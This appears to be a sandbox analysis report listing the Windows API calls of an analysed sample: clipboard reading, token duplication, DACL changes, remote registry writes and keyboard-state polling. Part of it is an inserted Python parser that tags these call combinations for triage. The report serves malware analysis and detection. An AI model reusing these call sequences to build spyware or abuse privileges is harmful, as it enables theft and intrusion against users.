                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                      • String ID: $default$winsta0
                                                      • API String ID: 2063423040-1027155976
                                                      • Opcode ID: 8fc6d279149a5d7bfc7ad765ce19fd9cd94d612c9da1d7662074621e903f2d0d
                                                      • Instruction ID: dfaee198571cd85fc75ca093a497149dc8ca4f5d8b307ef1a790df9d614937ac
                                                      • Opcode Fuzzy Hash: 8fc6d279149a5d7bfc7ad765ce19fd9cd94d612c9da1d7662074621e903f2d0d
                                                      • Instruction Fuzzy Hash: C8816A71900249BFDF11DFA8DD85AEEBBBCEF04344F18416AF910A6162DB398E15DB60
                                                      APIs
                                                      • OpenClipboard.USER32(00AEF910), ref: 00AD4284
                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00AD4292
                                                      • GetClipboardData.USER32(0000000D), ref: 00AD429A
                                                      • CloseClipboard.USER32 ref: 00AD42A6
                                                      • GlobalLock.KERNEL32(00000000), ref: 00AD42C2
                                                      • CloseClipboard.USER32 ref: 00AD42CC
                                                      • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00AD42E1
                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00AD42EE
                                                      • GetClipboardData.USER32(00000001), ref: 00AD42F6
                                                      • GlobalLock.KERNEL32(00000000), ref: 00AD4303
                                                      • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00AD4337
                                                      • CloseClipboard.USER32 ref: 00AD4447
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                      • String ID:
                                                      • API String ID: 3222323430-0
                                                      • Opcode ID: 5d0451df4da7336dc6e8e04105e4098f73a450981ac4184d4f4f245564d27f33
                                                      • Instruction ID: ca5fa91c094156820cb300882967b210fcf23f33803325e8c18f80efae6b929a
                                                      • Opcode Fuzzy Hash: 5d0451df4da7336dc6e8e04105e4098f73a450981ac4184d4f4f245564d27f33
                                                      • Instruction Fuzzy Hash: 3E51AF71204342AFD701EFA0DD86FAF77B8EF88B00F00452AF596D62A1DB70D9058B62
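The three listings above (the Shell_TrayWnd foreground-forcing routine, the token/window-station routine and the clipboard reader) share one layout: an APIs block of `Name.MODULE(args), ref: ADDR` lines, optional `Part of subcall function` lines, and a Similarity block carrying the String ID and fuzzy hashes. The following is an added example, not Joe Sandbox code: a parser that turns that text into records and tags call combinations an analyst would review first. The pattern labels and the SAMPLE text are constructed for illustration (the call lines are copied from the listings above); the labels are this example's own naming, not Joe Sandbox signature names.

```python
"""Parse Joe Sandbox per-function listings (APIs / Strings / Similarity
blocks) into records and tag call combinations worth reviewing.
Added example, not Joe Sandbox code.  SAMPLE is constructed from the
listings on this page; PATTERNS labels are this example's own."""
import re
from dataclasses import dataclass, field

SAMPLE = """APIs
• GetForegroundWindow.USER32(00000000,?), ref: 00A64A3D
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A9DA8E
• SetForegroundWindow.USER32(?), ref: 00A9DAAE
• AttachThreadInput.USER32(?,00000000,00000001), ref: 00A9DAE8
• keybd_event.USER32(00000012,00000000), ref: 00A9DB1B
Strings
Similarity
• API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event
• String ID: Shell_TrayWnd
• API String ID: 4125248594-2988720461
• Instruction Fuzzy Hash: 8E317571B40358BFEF20AFA19C89F7F3EACEB54B90F114025FA04EA1D0C6715951ABA0
APIs
  • Part of subcall function 00AB8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AB8D3A
  • Part of subcall function 00AB8CC3: GetLastError.KERNEL32 ref: 00AB8D47
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00AB88ED
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00AB8915
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00AB8952
Similarity
• API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess
• String ID: $default$winsta0
• Instruction Fuzzy Hash: C8816A71900249BFDF11DFA8DD85AEEBBBCEF04344F18416AF910A6162DB398E15DB60
APIs
• OpenClipboard.USER32(00AEF910), ref: 00AD4284
• GetClipboardData.USER32(0000000D), ref: 00AD429A
• CloseClipboard.USER32 ref: 00AD42A6
Similarity
• API ID: Clipboard$Global$Close
• String ID:
• Instruction Fuzzy Hash: 3E51AF71204342AFD701EFA0DD86FAF77B8EF88B00F00452AF596D62A1DB70D9058B62
"""

# One call line: optional "Part of subcall function XXXX: " prefix, then
# Name.MODULE, optional "(args)," and the call-site address after "ref:".
CALL_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<via>[0-9A-F]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\),)? ref: (?P<ref>[0-9A-F]+)$"
)
# Similarity fields we keep. "• API String ID:" deliberately matches none of these.
FIELD_PREFIXES = {
    "• API ID:": "api_id",
    "• String ID:": "string_id",
    "• Instruction Fuzzy Hash:": "fuzzy_hash",
}


@dataclass
class Call:
    api: str
    module: str
    args: str      # raw argument text; '?' marks values the sandbox could not resolve
    ref: str       # call-site address
    via: str = ""  # set when the call sits inside a sub-function


@dataclass
class Function:
    calls: list = field(default_factory=list)
    api_id: str = ""
    string_id: str = ""
    fuzzy_hash: str = ""

    def api_names(self) -> set:
        return {c.api for c in self.calls}

    def strings(self) -> list:
        # Joe Sandbox joins referenced strings with '$'; an empty field means none.
        return [s for s in self.string_id.split("$") if s]


def parse_functions(text: str) -> list:
    """Split report text on 'APIs' headers; one Function per listing."""
    funcs, cur = [], None
    for raw in text.splitlines():
        s = raw.strip()
        if s == "APIs":
            cur = Function()
            funcs.append(cur)
            continue
        if cur is None:
            continue
        m = CALL_RE.match(s)
        if m:
            cur.calls.append(Call(m["api"], m["mod"], m["args"] or "", m["ref"], m["via"] or ""))
            continue
        for prefix, attr in FIELD_PREFIXES.items():
            if s.startswith(prefix):
                setattr(cur, attr, s[len(prefix):].strip())
    return funcs


# Call combinations to review first (labels are this example's own naming).
PATTERNS = {
    "forces foreground window (AttachThreadInput + keybd_event)":
        {"SetForegroundWindow", "AttachThreadInput", "keybd_event"},
    "token duplication and desktop switch":
        {"AdjustTokenPrivileges", "DuplicateTokenEx", "OpenDesktopW"},
    "reads clipboard": {"OpenClipboard", "GetClipboardData"},
}


def tag_function(fn: Function) -> list:
    names = fn.api_names()
    return [label for label, needed in PATTERNS.items() if needed <= names]


def triage(text: str) -> list:
    """(fuzzy-hash prefix, tags, referenced strings) per tagged function."""
    out = []
    for fn in parse_functions(text):
        tags = tag_function(fn)
        if tags:
            out.append((fn.fuzzy_hash[:16], tags, fn.strings()))
    return out


if __name__ == "__main__":
    for hash_prefix, tags, strs in triage(SAMPLE):
        print(hash_prefix, tags, strs)
```

Calls reached through a sub-function are kept in the same record (the `via` field records which one), so a pattern still matches when, as in the token routine, the privilege adjustment happens one call level down. The fuzzy-hash prefix lets the tagged records be matched against other reports of the same AutoIt runtime build.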
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00ACC9F8
                                                      • FindClose.KERNEL32(00000000), ref: 00ACCA4C
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00ACCA71
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00ACCA88
                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00ACCAAF
                                                      • __swprintf.LIBCMT ref: 00ACCAFB
                                                      • __swprintf.LIBCMT ref: 00ACCB3E
                                                        • Part of subcall function 00A67F41: _memmove.LIBCMT ref: 00A67F82
                                                      • __swprintf.LIBCMT ref: 00ACCB92
                                                        • Part of subcall function 00A838D8: __woutput_l.LIBCMT ref: 00A83931
                                                      • __swprintf.LIBCMT ref: 00ACCBE0
                                                        • Part of subcall function 00A838D8: __flsbuf.LIBCMT ref: 00A83953
                                                        • Part of subcall function 00A838D8: __flsbuf.LIBCMT ref: 00A8396B
                                                      • __swprintf.LIBCMT ref: 00ACCC2F
                                                      • __swprintf.LIBCMT ref: 00ACCC7E
                                                      • __swprintf.LIBCMT ref: 00ACCCCD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                      • API String ID: 3953360268-2428617273
                                                      • Opcode ID: 8b3c1a19a44529e27a65602f18fbc18f6bd04d49aa1c31df60a476c61c93619f
                                                      • Instruction ID: 31eda235d19cb54b299f78a1f362904b27de9cb69f34fdd883b8ffdc5e0f390b
                                                      • Opcode Fuzzy Hash: 8b3c1a19a44529e27a65602f18fbc18f6bd04d49aa1c31df60a476c61c93619f
                                                      • Instruction Fuzzy Hash: 0DA11DB2508344ABC710EBA4C995DAFB7FCEF94704F40491DF586C7191EA34DA09CB62
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,756E8FB0,?,00000000), ref: 00ACF221
                                                      • _wcscmp.LIBCMT ref: 00ACF236
                                                      • _wcscmp.LIBCMT ref: 00ACF24D
                                                      • GetFileAttributesW.KERNEL32(?), ref: 00ACF25F
                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00ACF279
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00ACF291
                                                      • FindClose.KERNEL32(00000000), ref: 00ACF29C
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00ACF2B8
                                                      • _wcscmp.LIBCMT ref: 00ACF2DF
                                                      • _wcscmp.LIBCMT ref: 00ACF2F6
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00ACF308
                                                      • SetCurrentDirectoryW.KERNEL32(00B1A5A0), ref: 00ACF326
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00ACF330
                                                      • FindClose.KERNEL32(00000000), ref: 00ACF33D
                                                      • FindClose.KERNEL32(00000000), ref: 00ACF34F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                      • String ID: *.*
                                                      • API String ID: 1803514871-438819550
                                                      • Opcode ID: 0860407ba0b7e56752cbcd609449115ccdad3af1b3f957d5fd9d6f36a5d7e849
                                                      • Instruction ID: 7b6b5a00a495059180d8705c2cc0460a28bb11ceae1c4f77460671fc4f5df449
                                                      • Opcode Fuzzy Hash: 0860407ba0b7e56752cbcd609449115ccdad3af1b3f957d5fd9d6f36a5d7e849
                                                      • Instruction Fuzzy Hash: 8131C0765012497EDF10DBA4DC88FDE77ADEF48360F1141BAE920D71A0EB70DA458B54
                                                      APIs
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AE0BDE
                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00AEF910,00000000,?,00000000,?,?), ref: 00AE0C4C
                                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00AE0C94
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00AE0D1D
                                                      • RegCloseKey.ADVAPI32(?), ref: 00AE103D
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00AE104A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Close$ConnectCreateRegistryValue
                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                      • API String ID: 536824911-966354055
                                                      • Opcode ID: 10fa57b41213ed53e86d7b8f4285e646b5162c9c49f97ac4fe30c51ba3539791
                                                      • Instruction ID: a8b694e2123c1af7dd61e17afab486ff364af589fc475e0bcd8092eafa04feaa
                                                      • Opcode Fuzzy Hash: 10fa57b41213ed53e86d7b8f4285e646b5162c9c49f97ac4fe30c51ba3539791
                                                      • Instruction Fuzzy Hash: 740247752006519FCB14EF25C995E2AB7F9FF88724F04885DF88A9B262CB74ED41CB81
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,756E8FB0,?,00000000), ref: 00ACF37E
                                                      • _wcscmp.LIBCMT ref: 00ACF393
                                                      • _wcscmp.LIBCMT ref: 00ACF3AA
                                                        • Part of subcall function 00AC45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00AC45DC
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00ACF3D9
                                                      • FindClose.KERNEL32(00000000), ref: 00ACF3E4
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00ACF400
                                                      • _wcscmp.LIBCMT ref: 00ACF427
                                                      • _wcscmp.LIBCMT ref: 00ACF43E
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00ACF450
                                                      • SetCurrentDirectoryW.KERNEL32(00B1A5A0), ref: 00ACF46E
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00ACF478
                                                      • FindClose.KERNEL32(00000000), ref: 00ACF485
                                                      • FindClose.KERNEL32(00000000), ref: 00ACF497
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                      • String ID: *.*
                                                      • API String ID: 1824444939-438819550
                                                      • Opcode ID: ec80722321ac6d6b05cd441c3613ced115cc3b7a579588e4a9b14a339a3bee31
                                                      • Instruction ID: 611c2c28d18d68d8be1e7d02f6405994e01a9648ab23fe69220b09945c0e0d8b
                                                      • Opcode Fuzzy Hash: ec80722321ac6d6b05cd441c3613ced115cc3b7a579588e4a9b14a339a3bee31
                                                      • Instruction Fuzzy Hash: 3131C2725012596FCF14EBA4EC88FDE77AD9F49320F1141BAE820E61A0DB70DA85CB64
                                                      APIs
                                                        • Part of subcall function 00AB874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AB8766
                                                        • Part of subcall function 00AB874A: GetLastError.KERNEL32(?,00AB822A,?,?,?), ref: 00AB8770
                                                        • Part of subcall function 00AB874A: GetProcessHeap.KERNEL32(00000008,?,?,00AB822A,?,?,?), ref: 00AB877F
                                                        • Part of subcall function 00AB874A: HeapAlloc.KERNEL32(00000000,?,00AB822A,?,?,?), ref: 00AB8786
                                                        • Part of subcall function 00AB874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AB879D
                                                        • Part of subcall function 00AB87E7: GetProcessHeap.KERNEL32(00000008,00AB8240,00000000,00000000,?,00AB8240,?), ref: 00AB87F3
                                                        • Part of subcall function 00AB87E7: HeapAlloc.KERNEL32(00000000,?,00AB8240,?), ref: 00AB87FA
                                                        • Part of subcall function 00AB87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00AB8240,?), ref: 00AB880B
                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AB825B
                                                      • _memset.LIBCMT ref: 00AB8270
                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AB828F
                                                      • GetLengthSid.ADVAPI32(?), ref: 00AB82A0
                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00AB82DD
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AB82F9
                                                      • GetLengthSid.ADVAPI32(?), ref: 00AB8316
                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00AB8325
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00AB832C
                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AB834D
                                                      • CopySid.ADVAPI32(00000000), ref: 00AB8354
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AB8385
                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AB83AB
                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AB83BF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                      • String ID:
                                                      • API String ID: 3996160137-0
                                                      • Opcode ID: b22663e7a307a6244fea4b4f504e0bdc4e6e4896224f4d6877cc5345c3846d96
                                                      • Instruction ID: a024318444d6f20d0ddac6bc82d567ab63dd0970c260ac456273a83fde11bf6a
                                                      • Opcode Fuzzy Hash: b22663e7a307a6244fea4b4f504e0bdc4e6e4896224f4d6877cc5345c3846d96
                                                      • Instruction Fuzzy Hash: 04614C71900209AFDF00DF98DD85AEEBBBDFF04700F148169E915AA292DB399A45DF60
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                      • API String ID: 0-4052911093
                                                      • Opcode ID: 92814bfe19f1da81653f004ce409a45267e3372b5d3b216ba6efe47118f49a29
                                                      • Instruction ID: 1cfad5db8bc8a8634b147ba1e737799b443046f55e76efd45d7d78888020b017
                                                      • Opcode Fuzzy Hash: 92814bfe19f1da81653f004ce409a45267e3372b5d3b216ba6efe47118f49a29
                                                      • Instruction Fuzzy Hash: 90727F71E006199BDB24CF59C890BEEB7B5FF48310F54C16AE949EB281EB709D81CB90
                                                      APIs
                                                        • Part of subcall function 00AE10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AE0038,?,?), ref: 00AE10BC
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AE0737
                                                        • Part of subcall function 00A69997: __itow.LIBCMT ref: 00A699C2
                                                        • Part of subcall function 00A69997: __swprintf.LIBCMT ref: 00A69A0C
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00AE07D6
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00AE086E
                                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00AE0AAD
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00AE0ABA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 1240663315-0
                                                      • Opcode ID: 403a81340c08942cf56f83e50710743d018cfc33a8f0443c8a5a1689b85e840c
                                                      • Instruction ID: 97237df6414995957f5913fd97b20bdc0362dd9fbd80090e25c5eafca0d08335
                                                      • Opcode Fuzzy Hash: 403a81340c08942cf56f83e50710743d018cfc33a8f0443c8a5a1689b85e840c
                                                      • Instruction Fuzzy Hash: F9E15B31204250AFCB14DF29C995E6BBBF8EF89754F04896DF48ADB262DA30ED41CB51
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 00AC0241
                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00AC02C2
                                                      • GetKeyState.USER32(000000A0), ref: 00AC02DD
                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00AC02F7
                                                      • GetKeyState.USER32(000000A1), ref: 00AC030C
                                                      • GetAsyncKeyState.USER32(00000011), ref: 00AC0324
                                                      • GetKeyState.USER32(00000011), ref: 00AC0336
                                                      • GetAsyncKeyState.USER32(00000012), ref: 00AC034E
                                                      • GetKeyState.USER32(00000012), ref: 00AC0360
                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00AC0378
                                                      • GetKeyState.USER32(0000005B), ref: 00AC038A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: State$Async$Keyboard
                                                      • String ID:
                                                      • API String ID: 541375521-0
                                                      • Opcode ID: 4641f5b73c0b950caf7274eeb996f2dca74194046f4837a5408b93b2d96f4673
                                                      • Instruction ID: a7118b399c8b71445a3432d6d8c594590cc9653386bda689264543c9b14f6a76
                                                      • Opcode Fuzzy Hash: 4641f5b73c0b950caf7274eeb996f2dca74194046f4837a5408b93b2d96f4673
                                                      • Instruction Fuzzy Hash: 38419B345047C9EEFF319BA48848FF5BEA0AF21344F09409DD6C65E2C2EB9459C4C7A2
                                                      APIs
                                                        • Part of subcall function 00A69997: __itow.LIBCMT ref: 00A699C2
                                                        • Part of subcall function 00A69997: __swprintf.LIBCMT ref: 00A69A0C
                                                      • CoInitialize.OLE32 ref: 00AD8718
                                                      • CoUninitialize.OLE32 ref: 00AD8723
                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00AF2BEC,?), ref: 00AD8783
                                                      • IIDFromString.OLE32(?,?), ref: 00AD87F6
                                                      • VariantInit.OLEAUT32(?), ref: 00AD8890
                                                      • VariantClear.OLEAUT32(?), ref: 00AD88F1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                      • API String ID: 834269672-1287834457
                                                      • Opcode ID: c889efaffda36e3629a5ff8e5e03a1d1ca5be84bf9dac9041a7ba7db4d6077eb
                                                      • Instruction ID: 4661a37826a4ca3930050ab2aa17e5991fc4f25b24885e6058cceec3709db68c
                                                      • Opcode Fuzzy Hash: c889efaffda36e3629a5ff8e5e03a1d1ca5be84bf9dac9041a7ba7db4d6077eb
                                                      • Instruction Fuzzy Hash: 79618B706083019FD710DF64C988B6EBBE8EF48754F14485AF9869B391DB74ED48CB92
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
